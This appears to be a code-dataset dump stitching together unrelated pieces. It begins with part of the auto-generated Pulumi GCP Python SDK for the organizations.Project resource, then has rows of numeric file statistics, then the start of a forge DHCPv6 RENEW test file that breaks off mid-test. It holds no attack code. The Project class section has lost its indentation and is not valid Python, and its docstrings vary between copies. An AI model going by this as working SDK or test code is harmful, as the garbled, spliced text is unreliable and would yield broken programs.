        :param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
               Changing this forces a new project to be created. Only one of
               `org_id` or `folder_id` may be specified. If the `org_id` is
               specified then the project is created at the top level. Changing
               this forces the project to be migrated to the newly specified
               organization.
        :param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
               without deleting the Project via the Google API.
        """
        pulumi.set(__self__, "project_id", project_id)
        # Optional inputs are only recorded when explicitly supplied; absent
        # keys let the provider apply its own defaults.
        if auto_create_network is not None:
            pulumi.set(__self__, "auto_create_network", auto_create_network)
        if billing_account is not None:
            pulumi.set(__self__, "billing_account", billing_account)
        if folder_id is not None:
            pulumi.set(__self__, "folder_id", folder_id)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if org_id is not None:
            pulumi.set(__self__, "org_id", org_id)
        if skip_delete is not None:
            pulumi.set(__self__, "skip_delete", skip_delete)

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Input[str]:
        """
        The project ID. Changing this forces a new project to be created.
        """
        return pulumi.get(self, "project_id")

    @project_id.setter
    def project_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "project_id", value)

    @property
    @pulumi.getter(name="autoCreateNetwork")
    def auto_create_network(self) -> Optional[pulumi.Input[bool]]:
        """
        Create the 'default' network automatically. Default `true`.
        If set to `false`, the default network will be deleted. Note that, for quota purposes, you
        will still need to have 1 network slot available to create the project successfully, even if
        you set `auto_create_network` to `false`, since the network will exist momentarily.
        """
        return pulumi.get(self, "auto_create_network")

    @auto_create_network.setter
    def auto_create_network(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_create_network", value)

    @property
    @pulumi.getter(name="billingAccount")
    def billing_account(self) -> Optional[pulumi.Input[str]]:
        """
        The alphanumeric ID of the billing account this project
        belongs to. The user or service account performing this operation with the provider
        must have at minimum Billing Account User privileges (`roles/billing.user`) on the billing account.
        See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
        for more details.
        """
        return pulumi.get(self, "billing_account")

    @billing_account.setter
    def billing_account(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "billing_account", value)

    @property
    @pulumi.getter(name="folderId")
    def folder_id(self) -> Optional[pulumi.Input[str]]:
        """
        The numeric ID of the folder this project should be
        created under. Only one of `org_id` or `folder_id` may be
        specified. If the `folder_id` is specified, then the project is
        created under the specified folder. Changing this forces the
        project to be migrated to the newly specified folder.
        """
        return pulumi.get(self, "folder_id")

    @folder_id.setter
    def folder_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "folder_id", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A set of key/value label pairs to assign to the project.
        """
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The display name of the project.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="orgId")
    def org_id(self) -> Optional[pulumi.Input[str]]:
        """
        The numeric ID of the organization this project belongs to.
        Changing this forces a new project to be created. Only one of
        `org_id` or `folder_id` may be specified. If the `org_id` is
        specified then the project is created at the top level. Changing
        this forces the project to be migrated to the newly specified
        organization.
        """
        return pulumi.get(self, "org_id")

    @org_id.setter
    def org_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "org_id", value)

    @property
    @pulumi.getter(name="skipDelete")
    def skip_delete(self) -> Optional[pulumi.Input[bool]]:
        """
        If true, the resource can be deleted
        without deleting the Project via the Google API.
        """
        return pulumi.get(self, "skip_delete")

    @skip_delete.setter
    def skip_delete(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "skip_delete", value)
@pulumi.input_type
class _ProjectState:
    # Auto-generated state bag for looking up / importing an existing
    # Project resource. Unlike ProjectArgs, every field (including
    # project_id) is optional, and it additionally exposes the output-only
    # `number` attribute.
    def __init__(__self__, *,
                 auto_create_network: Optional[pulumi.Input[bool]] = None,
                 billing_account: Optional[pulumi.Input[str]] = None,
                 folder_id: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 number: Optional[pulumi.Input[str]] = None,
                 org_id: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 skip_delete: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering Project resources.

        :param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
               If set to `false`, the default network will be deleted. Note that, for quota purposes, you
               will still need to have 1 network slot available to create the project successfully, even if
               you set `auto_create_network` to `false`, since the network will exist momentarily.
        :param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
               belongs to. The user or service account performing this operation with the provider
               must have at minimum Billing Account User privileges (`roles/billing.user`) on the billing account.
               See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
               for more details.
        :param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
               created under. Only one of `org_id` or `folder_id` may be
               specified. If the `folder_id` is specified, then the project is
               created under the specified folder. Changing this forces the
               project to be migrated to the newly specified folder.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
        :param pulumi.Input[str] name: The display name of the project.
        :param pulumi.Input[str] number: The numeric identifier of the project.
        :param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
               Changing this forces a new project to be created. Only one of
               `org_id` or `folder_id` may be specified. If the `org_id` is
               specified then the project is created at the top level. Changing
               this forces the project to be migrated to the newly specified
               organization.
        :param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
        :param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
               without deleting the Project via the Google API.
        """
        # Only record the state fields that were actually supplied.
        if auto_create_network is not None:
            pulumi.set(__self__, "auto_create_network", auto_create_network)
        if billing_account is not None:
            pulumi.set(__self__, "billing_account", billing_account)
        if folder_id is not None:
            pulumi.set(__self__, "folder_id", folder_id)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if number is not None:
            pulumi.set(__self__, "number", number)
        if org_id is not None:
            pulumi.set(__self__, "org_id", org_id)
        if project_id is not None:
            pulumi.set(__self__, "project_id", project_id)
        if skip_delete is not None:
            pulumi.set(__self__, "skip_delete", skip_delete)

    @property
    @pulumi.getter(name="autoCreateNetwork")
    def auto_create_network(self) -> Optional[pulumi.Input[bool]]:
        """
        Create the 'default' network automatically. Default `true`.
        If set to `false`, the default network will be deleted. Note that, for quota purposes, you
        will still need to have 1 network slot available to create the project successfully, even if
        you set `auto_create_network` to `false`, since the network will exist momentarily.
        """
        return pulumi.get(self, "auto_create_network")

    @auto_create_network.setter
    def auto_create_network(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "auto_create_network", value)

    @property
    @pulumi.getter(name="billingAccount")
    def billing_account(self) -> Optional[pulumi.Input[str]]:
        """
        The alphanumeric ID of the billing account this project
        belongs to. The user or service account performing this operation with the provider
        must have at minimum Billing Account User privileges (`roles/billing.user`) on the billing account.
        See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
        for more details.
        """
        return pulumi.get(self, "billing_account")

    @billing_account.setter
    def billing_account(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "billing_account", value)

    @property
    @pulumi.getter(name="folderId")
    def folder_id(self) -> Optional[pulumi.Input[str]]:
        """
        The numeric ID of the folder this project should be
        created under. Only one of `org_id` or `folder_id` may be
        specified. If the `folder_id` is specified, then the project is
        created under the specified folder. Changing this forces the
        project to be migrated to the newly specified folder.
        """
        return pulumi.get(self, "folder_id")

    @folder_id.setter
    def folder_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "folder_id", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        A set of key/value label pairs to assign to the project.
        """
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The display name of the project.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def number(self) -> Optional[pulumi.Input[str]]:
        """
        The numeric identifier of the project.
        """
        return pulumi.get(self, "number")

    @number.setter
    def number(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "number", value)

    @property
    @pulumi.getter(name="orgId")
    def org_id(self) -> Optional[pulumi.Input[str]]:
        """
        The numeric ID of the organization this project belongs to.
        Changing this forces a new project to be created. Only one of
        `org_id` or `folder_id` may be specified. If the `org_id` is
        specified then the project is created at the top level. Changing
        this forces the project to be migrated to the newly specified
        organization.
        """
        return pulumi.get(self, "org_id")

    @org_id.setter
    def org_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "org_id", value)

    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> Optional[pulumi.Input[str]]:
        """
        The project ID. Changing this forces a new project to be created.
        """
        return pulumi.get(self, "project_id")

    @project_id.setter
    def project_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_id", value)

    @property
    @pulumi.getter(name="skipDelete")
    def skip_delete(self) -> Optional[pulumi.Input[bool]]:
        """
        If true, the resource can be deleted
        without deleting the Project via the Google API.
        """
        return pulumi.get(self, "skip_delete")

    @skip_delete.setter
    def skip_delete(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "skip_delete", value)
class Project(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None,
__props__=None):
"""
Allows creation and management of a Google Cloud Platform project.
Projects created with this resource must be associated with an Organization.
See the [Organization documentation](https://cloud.google.com/resource-manager/docs/quickstarts) for more details.
The user or service account that is running this provider when creating a `organizations.Project`
resource must have `roles/resourcemanager.projectCreator` on the specified organization. See the
[Access Control for Organizations Using IAM](https://cloud.google.com/resource-manager/docs/access-control-org)
doc for more information.
> This resource reads the specified billing account on every provider apply and plan operation so you must have permissions on the specified billing account.
To get more information about projects, see:
* [API documentation](https://cloud.google.com/resource-manager/reference/rest/v1/projects)
* How-to Guides
* [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects)
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
my_project = gcp.organizations.Project("myProject",
org_id="1234567",
project_id="your-project-id")
```
To create a project under a specific folder
```python
import pulumi
import pulumi_gcp as gcp
department1 = gcp.organizations.Folder("department1",
display_name="Department 1",
parent="organizations/1234567")
my_project_in_a_folder = gcp.organizations.Project("myProject-in-a-folder",
project_id="your-project-id",
folder_id=department1.name)
```
## Import
Projects can be imported using the `project_id`, e.g.
```sh
$ pulumi import gcp:organizations/project:Project my_project your-project-id
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
:param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
:param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
:param pulumi.Input[str] name: The display name of the project.
:param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
:param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
:param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
without deleting the Project via the Google API.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ProjectArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows creation and management of a Google Cloud Platform project.
Projects created with this resource must be associated with an Organization.
See the [Organization documentation](https://cloud.google.com/resource-manager/docs/quickstarts) for more details.
The user or service account that is running this provider when creating a `organizations.Project`
resource must have `roles/resourcemanager.projectCreator` on the specified organization. See the
[Access Control for Organizations Using IAM](https://cloud.google.com/resource-manager/docs/access-control-org)
doc for more information.
> This resource reads the specified billing account on every provider apply and plan operation so you must have permissions on the specified billing account.
To get more information about projects, see:
* [API documentation](https://cloud.google.com/resource-manager/reference/rest/v1/projects)
* How-to Guides
* [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects)
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
my_project = gcp.organizations.Project("myProject",
org_id="1234567",
project_id="your-project-id")
```
To create a project under a specific folder
```python
import pulumi
import pulumi_gcp as gcp
department1 = gcp.organizations.Folder("department1",
display_name="Department 1",
parent="organizations/1234567")
my_project_in_a_folder = gcp.organizations.Project("myProject-in-a-folder",
project_id="your-project-id",
folder_id=department1.name)
```
## Import
Projects can be imported using the `project_id`, e.g.
```sh
$ pulumi import gcp:organizations/project:Project my_project your-project-id
```
:param str resource_name: The name of the resource.
:param ProjectArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProjectArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProjectArgs.__new__(ProjectArgs)
__props__.__dict__["auto_create_network"] = auto_create_network
__props__.__dict__["billing_account"] = billing_account
__props__.__dict__["folder_id"] = folder_id
__props__.__dict__["labels"] = labels
__props__.__dict__["name"] = name
__props__.__dict__["org_id"] = org_id
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["skip_delete"] = skip_delete
__props__.__dict__["number"] = None
super(Project, __self__).__init__(
'gcp:organizations/project:Project',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
auto_create_network: Optional[pulumi.Input[bool]] = None,
billing_account: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
number: Optional[pulumi.Input[str]] = None,
org_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
skip_delete: Optional[pulumi.Input[bool]] = None) -> 'Project':
"""
Get an existing Project resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
If set to `false`, the default network will be deleted. Note that, for quota purposes, you
will still need to have 1 network slot available to create the project successfully, even if
you set `auto_create_network` to `false`, since the network will exist momentarily.
:param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
belongs to. The user or service account performing this operation with the provider
must have at mininum Billing Account User privileges (`roles/billing.user`) on the billing account.
See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
for more details.
:param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
created under. Only one of `org_id` or `folder_id` may be
specified. If the `folder_id` is specified, then the project is
created under the specified folder. Changing this forces the
project to be migrated to the newly specified folder.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
:param pulumi.Input[str] name: The display name of the project.
:param pulumi.Input[str] number: The numeric identifier of the project.
:param pulumi.Input[str] org_id: The numeric ID of the organization this project belongs to.
Changing this forces a new project to be created. Only one of
`org_id` or `folder_id` may be specified. If the `org_id` is
specified then the project is created at the top level. Changing
this forces the project to be migrated to the newly specified
organization.
:param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
:param pulumi.Input[bool] skip_delete: If true, the resource can be deleted
without deleting the Project via the Google API.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProjectState.__new__(_ProjectState)
__props__.__dict__["auto_create_network"] = auto_create_network
__props__.__dict__["billing_account"] = billing_account
__props__.__dict__["folder_id"] = folder_id
__props__.__dict__["labels"] = labels
__props__.__dict__["name"] = name
__props__.__dict__["number"] = number
__props__.__dict__["org_id"] = org_id
__props__.__dict__["project_id"] = project_id
__props__.__dict__["skip_delete"] = skip_delete
return Project(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="autoCreateNetwork")
def auto_create_network(self) -> pulumi.Output[Optional[bool]]:
    """
    Whether the 'default' network is created automatically (defaults to
    `true`). When set to `false` the default network is deleted after
    project creation; one network quota slot must still be free, because
    the network exists momentarily before removal.
    """
    return pulumi.get(self, "auto_create_network")
@property
@pulumi.getter(name="billingAccount")
def billing_account(self) -> pulumi.Output[Optional[str]]:
    """
    Alphanumeric ID of the billing account this project is attached to.
    The user or service account driving the provider needs at minimum
    Billing Account User (`roles/billing.user`) on that account; see
    [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
    for details.
    """
    return pulumi.get(self, "billing_account")
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> pulumi.Output[str]:
    """
    Numeric ID of the folder the project lives under. Mutually exclusive
    with `org_id`; when given, the project is created under that folder,
    and changing it migrates the project to the newly specified folder.
    """
    return pulumi.get(self, "folder_id")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """
    Key/value label pairs assigned to the project.
    """
    return pulumi.get(self, "labels")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """
    Display name of the project.
    """
    return pulumi.get(self, "name")
@property
@pulumi.getter
def number(self) -> pulumi.Output[str]:
    """
    Numeric identifier assigned to the project.
    """
    return pulumi.get(self, "number")
@property
@pulumi.getter(name="orgId")
def org_id(self) -> pulumi.Output[str]:
    """
    Numeric ID of the organization this project belongs to. Mutually
    exclusive with `folder_id`; when given, the project sits at the top
    level of the organization. Setting it on creation forces a new
    project, and changing it later migrates the project to the newly
    specified organization.
    """
    return pulumi.get(self, "org_id")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
    """
    The project ID; changing it forces a new project to be created.
    """
    return pulumi.get(self, "project_id")
@property
@pulumi.getter(name="skipDelete")
def skip_delete(self) -> pulumi.Output[bool]:
    """
    When true, destroying this resource does not delete the underlying
    Project through the Google API.
    """
    return pulumi.get(self, "skip_delete")
| 47.26971
| 165
| 0.648613
| 4,353
| 34,176
| 4.94096
| 0.059269
| 0.064953
| 0.055979
| 0.047052
| 0.919658
| 0.912265
| 0.904687
| 0.899247
| 0.892505
| 0.880649
| 0
| 0.001827
| 0.263138
| 34,176
| 722
| 166
| 47.33518
| 0.852242
| 0.505091
| 0
| 0.788274
| 1
| 0
| 0.083537
| 0.002301
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162866
| false
| 0.003257
| 0.016287
| 0
| 0.276873
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
586e89dedd96060bbe2d352f5099a33f3d610b9b
| 23,281
|
py
|
Python
|
tests/dhcpv6/process/test_v6_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/process/test_v6_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/process/test_v6_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
"""DHCPv6 Renew"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import srv_msg
import references
import misc
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply():
    """Basic RENEW/REPLY exchange.

    SOLICIT -> ADVERTISE -> REQUEST -> REPLY -> RENEW -> REPLY.
    The final REPLY must include client-id (1), server-id (2) and an
    IA-NA (3) carrying an IA-Address (sub-option 5).
    """
    def expect_options(codes):
        # Each listed top-level option must be present; option 3 must
        # additionally carry sub-option 5 (the IA address).
        for code in codes:
            srv_msg.response_check_include_option('Response', None, code)
        srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::5-3000::55')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    # SOLICIT / ADVERTISE
    misc.test_procedure()
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    expect_options(['1', '2', '3'])

    # REQUEST / REPLY
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    expect_options(['3'])

    # RENEW / REPLY
    misc.test_procedure()
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    expect_options(['1', '2', '3'])

    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid():
    """Client A renews using the IA_NA copied from client B's REPLY.

    Both clients share IA_ID 666 but have different DUIDs; the pool holds
    exactly two addresses, so each client gets one of them.
    """
    # Two clients try to renew address, using the same IA_ID but different Client-ID
    misc.test_setup()
    srv_control.set_time('renew-timer', '50')
    srv_control.set_time('rebind-timer', '60')
    srv_control.set_time('preferred-lifetime', '70')
    srv_control.set_time('valid-lifetime', '80')
    # Pool of exactly two addresses: 3000::1 and 3000::2.
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    # Client A (DUID ...:01): SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client A: REQUEST / REPLY — obtains its lease.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B (DUID ...:22), same ia_id 666: SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_does_include('Client', None, 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    # Client B: REQUEST / REPLY — obtains the other lease.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:22')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('REQUEST')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')

    misc.test_procedure()
    # client try to renew address that is not his
    # (the IA_NA copied below comes from client B's REPLY, the last
    # message received, while the RENEW is sent with client A's DUID)
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_does_include('Client', None, 'client-id')
    srv_msg.client_send_msg('RENEW')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', None, 'REPLY')
    srv_msg.response_check_include_option('Response', None, '1')
    srv_msg.response_check_include_option('Response', None, '2')
    srv_msg.response_check_include_option('Response', None, '3')
    srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
    # NOTE(review): the four checks below appear to expect BOTH addresses
    # in the REPLY — 3000::2 (client B's lease) with validlft 0 and
    # 3000::1 (client A's own lease) with validlft 80. Confirm against
    # forge's response_check_suboption_content matching semantics.
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '0')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::2')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'validlft', '80')
    srv_msg.response_check_suboption_content('Response', '5', '3', None, 'addr', '3000::1')
    references.references_check('RFC')
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.renew
def test_v6_message_renew_reply_different_clients_the_same_iaid_2():
    """Client B renews its own lease while sharing IA_ID 666 with client A.

    Counterpart to the previous test: here the RENEW uses the correct
    (own) IA_NA, so only the client's own address may come back.
    """
    # Two clients try to renew address, using the same IA_ID but different Client-ID
    misc.test_setup()
    srv_control.set_time('renew-timer', '50')
    srv_control.set_time('rebind-timer', '60')
    srv_control.set_time('preferred-lifetime', '70')
    srv_control.set_time('valid-lifetime', '80')
    # Pool of exactly two addresses: 3000::1 and 3000::2.
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::2')
    srv_control.build_and_send_config_files('SSH', 'config-file')
    srv_control.start_srv('DHCP', 'started')

    # Client A (DUID ...:01): SOLICIT / ADVERTISE.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'ia_id', '666')
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
